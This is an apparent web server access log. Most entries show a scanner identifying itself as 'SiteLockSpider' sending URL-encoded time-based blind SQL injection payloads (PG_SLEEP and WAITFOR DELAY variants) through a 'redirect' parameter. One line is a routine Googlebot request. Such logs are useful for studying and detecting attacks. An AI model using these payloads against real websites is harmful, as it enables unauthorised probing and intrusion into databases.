184.154.139.41 - - [09/Jun/2026:09:56:19 -0400] "GET /?redirect=6272%29%20AND%208169%3D%28SELECT%208169%20FROM%20PG_SLEEP%285%29%29%20AND%20%285310%3D5310 HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:21 -0400] "GET /?redirect=6272%20AND%208169%3D%28SELECT%208169%20FROM%20PG_SLEEP%285%29%29 HTTP/1.1" 200 42536 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:22 -0400] "GET /?redirect=6272%20AND%208169%3D%28SELECT%208169%20FROM%20PG_SLEEP%285%29%29--%20kMuj HTTP/1.1" 200 42536 "-" "SiteLockSpider"
66.249.69.65 - - [09/Jun/2026:09:56:23 -0400] "GET /products/3270378 HTTP/1.1" 404 20947 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
184.154.139.41 - - [09/Jun/2026:09:56:24 -0400] "GET /?redirect=6272%27%29%20AND%208169%3D%28SELECT%208169%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27hRph%27%3D%27hRph HTTP/1.1" 200 42542 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:25 -0400] "GET /?redirect=6272%27%20AND%208169%3D%28SELECT%208169%20FROM%20PG_SLEEP%285%29%29%20AND%20%27ZLCi%27%3D%27ZLCi HTTP/1.1" 200 42537 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:26 -0400] "GET /?redirect=6272%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%287051%3D7051 HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:26 -0400] "GET /?redirect=6272%20WAITFOR%20DELAY%20%270%3A0%3A5%27 HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:27 -0400] "GET /?redirect=6272%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20UNEI HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:27 -0400] "GET /?redirect=6272%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27dlwo%27%3D%27dlwo HTTP/1.1" 403 1242 "-" "SiteLockSpider"
184.154.139.41 - - [09/Jun/2026:09:56:27 -0400] "GET /?redirect=6272%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27cYHN%27%3D%27cYHN HTTP/1.1" 403 1242 "-" "SiteLockSpider"
